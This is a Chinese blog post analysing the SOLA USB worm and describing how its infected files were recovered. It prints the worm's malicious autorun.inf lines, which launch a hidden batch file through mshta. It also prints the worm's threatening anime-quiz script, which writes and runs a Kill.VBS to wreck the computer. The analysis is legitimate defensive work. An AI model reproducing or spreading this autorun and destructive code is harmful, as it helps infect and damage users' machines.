遭遇SOLA病毒——分析和解决方案 防病毒解决方案

昨天乱插了一次U盘,结果发现根目录的一个txt变成应用程序了(图标还是文本文档的),意识到中招了,不禁欣喜若狂,连忙跑回家,打开影子模式和沙盘,进行我的分析测试。


因为原先闪盘做过免疫,根目录的Autorun.inf文件夹还在(这说明病毒威力不咋地),但免疫文件夹下却出现了病毒生成的Autorun,我打开该文件,内容如下:
SOLA_1.0_2.0
[autorun]
shell打开(&O)command=mshta "javascript:newActiveXObject('WScript.Shell').Run('SOLA\SOLA.BAT-USB',0);window.close()"
shell=打开(&O)
shellopen=复制磁盘(&C)
shellopenCommand=mshta "javascript:newActiveXObject('WScript.Shell').Run('SOLA\SOLA.BAT-USB',0);window.close()"
shellopenDefault=1
shellexplore=资源管理器(&X)
shellexploreCommand=mshta "javascript:newActiveXObject('WScript.Shell').Run('SOLA\SOLA.BAT-USB',0);window.close()"

显示所有文件和系统文件,果然在闪盘的根目录下多了个隐藏的文件夹SOLA,里面有两个文件:Function.dll和SOLA.bat,其中那个动态链接库文件应该是功能实现的主文件,而那个批处理应该是调用病毒的接口。从autorun中可以看出,是通过系统VBS来调用带有参数的SOLA.bat文件,看来一切的奥秘都在那个文件里了。


打开SOLA.bat,里面内容很多,让我感觉似乎这个文件就能实现病毒的大多数功能。我的目光突然留意到了这一句:rar -m0 -ep -ep1 a %setup%docpack.dll%sola%Function.dll
rar是WinRar的DOS命令文件,难道那个dll其实不是动态链接库,而是一个压缩包?我打开WinRar,定位到Function.dll,双击进去,又出现一堆文件,果然是个压缩包。

我把这一阶段的工作先放一放,先检查我的盘里都被感染了什么文件,最后发现病毒只感染了4类文件:txt、doc、jpg、exe(体积比较小的),图标还是原先的图标,用沙盘打开,也能显示出原有的文件内容,可谓相当隐蔽。和一些感染类病毒不同,运行的时候并没有释放出宿主文件,这让我的数据恢复受到了很大的阻碍。我突然想起,Function.dll不是伪装成压缩包吗,可能病毒制作者也会用同样的方法来处理感染文件,我将一个感染了的txt后缀改rar,然后双击打开,果然看到了被隐藏起来的原始文件,我将其解压出来,用attrib去除隐藏系统属性,这就算恢复成功了。但我被感染的文件太多了,这么手工恢复,不累死也得累疯,必须想点别的办法。

我开始查看Function.dll里面的那堆文件:
Autorun.inf
docpack.dll
exepack.dll
jpgpack.dll
txtpack.dll
Rar.exe
sleep.exe
SOLA.BAT
infect.bat
LocalScan.bat
readlnk.bat
RecentInf.bat
scan.bat
Tasks.xxx
TDPack.txt
EJPack.txt
TENBATSU.BAT
KillVirus.TXT
SolaKiller.rar

开始一个一个分析先,好爽。
1、Autorun.inf
这个不用多说,是病毒自动运行的autorun文件的副本,和感染后的autorun一模一样
2、docpack.dll,exepack.dll,jpgpack.dll,txtpack.dll
这四个文件是感染4类文件的功能文件,原来还以为也是压缩包,后来发现不是,留待以后继续研究
3、Rar.exe
这个是Winrar的DOS命令文件,可以从任何已安装的Winrar目录下获取,病毒自带可以方便完成各种解压操作
4、sleep.exe
功能不明,体积很小,留待以后研究
5、SOLA.BAT
和外面的同名文件一样,是副本
6、infect.bat,LocalScan.bat,readlnk.bat,RecentInf.bat,scan.bat
SOLA文件需要调用的功能模块,同时完成病毒的所有功能,包括驻留内存、添加启动项,系统中留后门、感染那4类文件,检测可移动设备等
7、Tasks.xxx,TDPack.txt,EJPack.txt
可能是某些代码的副本,应该在SOLA.BAT中能得到解释
8、TENBATSU.BAT
在这个文件中,病毒制作者留下了他的讯息,我们可以通过这个吓唬人的批处理,感受到病毒制作者的心情。
内容如下(一些代码部分省略):

-----------------分割线------------------
echo警告:如果现在关闭计算机,计算机将无法启动!!!
echoI'm a virus. My name is sola.
echo我是一个病毒。我的名字叫苏拉。
echo今天,在这片堕落的土地上,我苏醒过来。
echo我曾经很快乐地活着,与我的朋友,ACG,快乐地活着。
echo我曾经也对病毒深恶痛绝。
echo然而.............
echo自从我来到了这片土地上,这片自称伟大,崇高,光明的土地上。
echo这片名为中国的土地上
echo我的朋友,已遍体鳞伤。
echo他死了
echoDeath Note
echo《死亡笔记》
echo她死了
echoKoihime Musou
echo《恋姬 无双》
echo还有好多好多的同胞,惨死在你们的蹂躏之下。
echo广电总局的一纸通告,无数只肮脏的手便掩盖了她的气息。
echo互联网上的一句咒骂,无数声污秽的咒骂便淹没了她的踪迹。
echo我终于知道了,信息,原来是无法透过国界线而传播的。
echo即使是爱,即使是恨,即使是那一个个爱恨与泪水交织的故事。
echo也无法透过GFW,更无法透过这个国度的某些人心中,那道厚厚的屏障。
echo于是,我愿做这个罪恶的病毒,来再次查看,你的心灵。
echo你,是谁???
echo是中国人吗?
echo是民族情绪的受害人吗?
echo还是知道,世界上有一个词语叫ACG,并能够容忍,接纳它呢?
echo那,让我们来做一个游戏吧。
sleep 2000
echo也许你的记忆中,还有1000年前夏天的传说。
sleep 2000
echo还有120元的车票,
sleep 1000
echo还有银河铁道,
sleep 1000
echo还有钢琴之森,
sleep 1000
echo还有澄澈的天空下,响起的祈祷之歌。
sleep 3000
echo你需要做的,仅仅是回答几个问题。
sleep 2000
echo你喜欢动画吗?
sleep 800
echo你喜欢漫画吗?
sleep 800
echo你喜欢GAL游戏吗?
sleep 2000
echo选择你最擅长的测试卷吧,然后用你聪明的头脑思考,写出心中的答案。
sleep 2000
echo如果你的试卷能及格,我将痛悔我的罪行,并删除自己。
sleep 2000
echo如果你的试卷是零分,我将继承同伴的愤怒,破坏你的计算机。
sleep 2000
echo另外我必须说,我只能把10分钟的时间留给你。
sleep 2000
echo现在,你无法逃避。
sleep 2000
echo因为你已经无法打开任务管理器,更无法上网查找信息。
sleep 2000
echo选择吧,但是要快,容不得犹豫。我已经打开了我的计时器。
sleep 1000
echo 
echo 我最擅长的测试卷:
:Choice
set /p choice=(请输入 A 或 G 。A=动画,G=GAL游戏。输入后按回车。):

if /I "%choice%"=="a" goto Anime
if /I "%choice%"=="g" goto Galgame

goto Choice
:Anime

set grade=0
:AQ1
cls
set ask=
echo----------------问题1---------------------(注:一共有5个问题。只要答对两个或两个以上就过关。)
echo男主角在入学第一天就听到女主角惊天动地的发言,并加入了女主角创建的一个社团,这个社团教室原本是文学社的,但被女主角强行占用。主要社团成员有:眼睛娘、很有气势的社长、有着魔鬼身材,比男主角高一个年级的吉祥物、被社长指挥得团团转的男主角。
echo 请问这个社团叫什么团?(3个英文字母)
echo 如果无法回答,请输入next,跳转到下一个问题。
echo 
set /p ask=回答:
if /i "%ask%"=="sos" set /a grade=%grade%+1
if /i "%ask%"=="" goto AQ1
遭遇SOLA病毒——分析和解决方案 防病毒解决方案
:AQ2
cls
set ask=
echo ----------------问题2---------------------
echo男主角与女主角在小镇上相遇,女主角非常喜欢恐龙,有模仿某种动物叫声的口癖,并且女主角与n(n大于或等于618,小于或等于1321)年前某个夏天的故事有关系,这个女主角和n年前夏天故事的女主角的姓氏的第一个字都是“神”。
echo 请写出这部作品的名称(3个英文字母)
echo 如果无法回答,请输入next,跳转到下一个问题。
echo 
set /p ask=回答:
if /i "%ask%"=="air" set /a grade=%grade%+1
if "%ask%"=="" goto AQ2
:AQ3
cls
set ask=
echo ----------------问题3---------------------
echo如果用B、C分别代表2种人或物体的名称,那么每隔一段时间,就会有7个被B选中的人参加一种名为B战争的战斗,获胜者可以获得B,而C是B召唤出来的,拥有强大的力量,帮助主人为了B而战斗。
echo 请问这部作品的名称的前4个英文字母是什么?
echo 如果无法回答,请输入next,跳转到下一个问题。
echo 
set /p ask=回答:
if /i "%ask%"=="fate" set /a grade=%grade%+1
if "%ask%"=="" goto AQ3
:AQ4
cls
set ask=
echo ----------------问题4---------------------
echo如果用A表示一个名词,那么有一部作品的名称为A少女,A少女们互相战斗,夺取对方的A之心,没有A之心的少女会永远沉睡,一个A少女收集齐了其他A少女的A之心之后,就有某种事情要发生。
echo 请问A的汉语拼音字母是(8个字母)
echo 如果无法回答,请输入next,跳转到下一个问题。
echo 
set /p ask=回答:
if /i "%ask%"=="qiangwei" set /a grade=%grade%+1
if "%ask%"=="" goto AQ4
:AQ5
cls
set ask=
echo ----------------问题5---------------------
echo有一种战斗机,只有神经系统接受了改造的人才能驾驶。4个孩子作为该战斗机的驾驶员展开训练,3个孩子先后在事故中丧生。军方为了给最后一个孩子作战的理由,让她转入了某学校。她于一个晚上,在学校的游泳池里遇到了男主角。后来,女主角加入了一个社团,该社团连同女主角共有4人。
echo 这部作品名称中有3个英文字母,请问这3个英文字母是?
echo 如果无法回答,请输入next,跳转到计分程序。
echo 
set /p ask=回答:
if /i "%ask%"=="ufo" set /a grade=%grade%+1
if "%ask%"=="" goto AQ5
cls
goto MarkCount


:Galgame

set grade=0
:GQ1
cls
set ask=
echo----------------问题1---------------------(注:一共有5个问题。只要答对两个或两个以上就过关。)
echo患病的男主角在医院里遇上患病的少女,并和她一起逃出医院,到达了某地。这个地方盛产某种花,而女主角也喜欢这种花。传说这种花是一个美男子被诅咒而变成的。
echo 请问这部作品的名称是?(8个英文字母。)
echo 如果无法回答,请输入next,跳转到下一个问题。
echo 
set /p ask=回答:
if /i "%ask%"=="narcissu" set /a grade=%grade%+1
if /i "%ask%"=="" goto GQ1
:GQ2
cls
set ask=
echo ----------------问题2---------------------
echo男主角与女主角在小镇上相遇,女主角非常喜欢恐龙,有模仿某种动物叫声的口癖,并且女主角与n(n大于或等于618,小于或等于1321)年前某个夏天的故事有关系,这个女主角和n年前夏天故事的女主角的姓氏的第一个字都是“神”。
echo 请写出这部作品的名称(3个英文字母)
echo 如果无法回答,请输入next,跳转到下一个问题。
echo 
set /p ask=回答:
if /i "%ask%"=="air" set /a grade=%grade%+1
if "%ask%"=="" goto GQ2
:GQ3
cls
set ask=
echo ----------------问题3---------------------
echo男主角遭遇车祸,醒来后发现世界已经变成地狱一般的景象,往昔的朋友变成了怪物。只有女主角在他的眼中才是正常的人类。于是,他守护着自己心中唯一的真实。
echo 请写出这部作品的女主角的名字的中文拼音。(5个字母,字母中间不要加空格。)
echo 如果无法回答,请输入next,跳转到下一个问题。
echo 
set /p ask=回答:
if /i "%ask%"=="shaye" set /a grade=%grade%+1
if "%ask%"=="" goto GQ3
:GQ4
cls
set ask=
echo ----------------问题4---------------------
echo有如下词语来描述B:很小,有薄薄的翅膀,下雨也不会被淋湿。有如下词语来描述A:一种乐器,要靠魔力来演奏,与人声搭配最为恰当。而C是一个一年四季都下着雨的城市,D是一所音乐学院。
echo请写出故事情节中同时包含A、B、C、D的作品的中文名称的前三个字的汉语拼音字母。(12个字母,字母中间不要加空格。)
echo 如果无法回答,请输入next,跳转到下一个问题。
echo 
set /p ask=回答:
if /i "%ask%"=="jiaoxiangyue" set /a grade=%grade%+1
if "%ask%"=="" goto GQ4
:GQ5
cls
set ask=
echo ----------------问题5---------------------
echo在N年以后,人口暴涨。有些人就按下导弹开关,使细菌兵器袭击了地球,最终引起了一场恶战。在地球上的人类已经所剩无几的时候,有一个人为了寻找战前人类留下的有用物品,进入了一个废墟都市。在那里,他遇到了一个天象馆里的礼仪机器人,并和她发生了一段故事。
echo 这部作品名称的中文拼音是?(11个字母。字母中间不要加空格。其中第一个字是后鼻音。)
echo 如果无法回答,请输入next,跳转到计分程序。
echo 
set /p ask=回答:
if /i "%ask%"=="xingzhimeng" set /a grade=%grade%+1
if "%ask%"=="" goto GQ5
cls
goto MarkCount

:MarkCount
if "%grade%"=="0" goto Kill
if "%grade%"=="1" goto Kill
goto SelfKill


:Kill
cls
echo你的成绩是%Grade%分,不及格!!!!!!!!!!
echo不及格 不及格 不及格!!!!!!!!!!!!!!!!!!!!
echo 
echo
echo那么,就按照契约,毁灭你的计算机吧!!!!!
echo On Error Resume Next>Kill.VBS
echo setws=wscript.createobject("wscript.shell")>>Kill.VBS
echo ws.run "%sola%sola.bat -Kill",0>>Kill.VBS
start Kill.VBS

:Kill20
cls
echo你的成绩是%Grade%分,不及格!!!!!!!!!!
echo不及格 不及格 不及格!!!!!!!!!!!!!!!!!!!!
echo
echo那么,就按照契约,毁灭你的计算机吧!!!!!
pause>nul
goto Kill20

:Selfkill
echo您的成绩是%Grade%分,及格了。
echo谢谢您完成了这套试题。5秒钟后,我将按照契约,删除自己。
echo希望您能够过得愉快,再见。
echo 
sleep 5000
echo >%systemroot%FontsHIDESE~1Killself
echo On Error Resume Next>KillSelf.VBS
echo setws=wscript.createobject("wscript.shell")>>KillSelf.VBS
echo ws.run "%sola%sola.bat -Killself",0>>KillSelf.VBS
start KillSelf.VBS
Exit

-----------------分割线------------------

看到这里,我们也许都若有所思了,不懂批处理的朋友们也无所谓,只需看文字就可以了。

9、KillVirus.TXT
全文如下:
各位OTAKU:
您好。首先,让我对此病毒给您带来的
不便向您道歉。
SOLA已经从您的计算机中清除。但由于
WINLOGON被锁定,计算机暂时无法关机、重
启,也无法打开任务管理器。但这些问题在
冷重启后即可解决。
您的计算机已经有了SOLA的标记,因此
不会重复感染。
在硬盘中还留有被SOLA病毒感染的文件
,尽管不会重复感染,但建议您清除它们。
系统中已经安装了SOLA的专杀程序,它可以
帮助您扫描并清除带毒文件。
祝您好运。

SOLA的制造者
KAKENHI

病毒制造者说有专杀程序的提供,那就应该是最后一个文件了。

10、SolaKiller.rar
这个应该是作者提供的专杀,有了它,我就可以修复所有已经被感染的文件了。我打开,mygod,居然有密码,密码是什么?sola?不是。哦,我突然想到rar命令的-hp参数,可以解压文件而且密码是明文保存的。我打开SOLA.bat,搜索SolaKiller.rar,果然找到如下一行:rarx -hpkakenhi200601%setup%SolaKiller.rar,ok,密码为kakenhi200601,成功解压该压缩包,利用作者提供的专杀工具,清除了所有的病毒。

title SOLA病毒专杀软件 Made by KAKENHI.
if not exist %systemroot%system32Rar.exe goto ERR1
if not exist %systemroot%system32sleep.exe goto ERR2
:screen
cls
echo欢迎,此程序可以帮助您清除计算机中的SOLA病毒。
echo 
echo 
echo 请输入命令:
echo 
echoKILL杀除系统中的SOLA病毒及硬盘根目录下的AUTORUN。
echoSCAN扫描被SOLA病毒感染的文件,进行文件杀毒。
echoSET进行SOLA专杀的相关设置。
echoUNINST 卸载SOLA专杀程序。
echo 
set command=
set /p command=COMMAND:

if /i "%COMMAND%"=="KILL" goto Kill
if /i "%COMMAND%"=="SCAN" goto Scan
if /i "%COMMAND%"=="SET" goto Set
if /i "%COMMAND%"=="UNINST" goto Uninst
goto screen

这个病毒从始至终似乎都是一个对社会现状不满的发泄,但它反映出的种种问题是需要我们思索的,我们和谐社会的构建究竟需要做些什么,又能带给我们什么?我想不会是这几个幽怨的病毒存在的理由。这些,也许应该好好斟酌了。


虽然我对日本ACG没什么好感,但毕竟也有过令自己唏嘘不已的经典作品,这么一棍子打死和闭关锁国并无本质区别。构建和谐社会的目的,不是把一切不和谐的事物统统打倒,而是寻找一种解决方案。就像大禹治水那样,堵塞必然会酿成大祸,只有加以疏导,才能消祸造福苍生。

  

爱华网本文地址 » http://www.413yy.cn/a/25101018/369732.html

更多阅读

电脑音箱没有声音的原因和解决方法 蓝牙音箱没有声音原因

  最近笔者发现,有不少的网友都有遇到过突然电脑音箱没有声音的故障,故此笔者认为有必要为大家整理一篇关于电脑音箱没有声音的原因分析和解决方法文章,下面将为你详细的介绍电脑没声音的原因和解决方法。电脑音箱没有声音的原因和

网页自动弹出的原因分析与解决方案 oom的原因及解决方案

网络在日常生活中给我们带来了快乐,让我们在闲暇之余可以放松,可是,有些不法分子为了自己运营的网站获取高额的点击率,恶意发布木马、病毒等一些能让网页无规律自动弹出的东西,这让我们在上网的时候很不愉快。为了不让这些人逍遥法外,今天

学生学习成绩不好的原因分析和解决办法摘

影响学生成绩的原因主要有:行为习惯、学习动机、学习方法和学习环境。第一、习惯不好。很多学生一放学回家,总爱先挑自己喜欢科目的作业来做,一会儿翻翻这本书一会儿又翻翻那本书,一晃到了晚上,很多学生喜欢边做作业边吃东西边听歌。再者

声明:《遭遇SOLA病毒——分析和解决方案 防病毒解决方案》为网友惯性想象分享!如侵犯到您的合法权益请联系我们删除